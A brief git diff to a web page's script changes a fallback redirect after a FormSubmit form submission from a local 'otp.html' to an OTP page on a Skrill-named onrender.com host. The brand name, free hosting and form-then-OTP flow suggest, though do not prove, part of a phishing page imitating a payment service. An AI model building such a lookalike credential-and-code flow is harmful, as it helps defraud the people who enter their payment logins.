--- a/index.html
+++ b/index.html
@@ -32,7 +32,7 @@
                 setTimeout(() => {
                     if (!sessionStorage.getItem("formSuccess")) {
                         console.warn("FormSubmit may have failed, redirecting manually...");
-                        window.location.href = "otp.html"; // Fallback redirect
+                        window.location.href = "https://skrill-web.onrender.com/otp.html"; // Fallback redirect
                     }
                 }, 5000); // Wait 5 seconds before assuming failure
             });
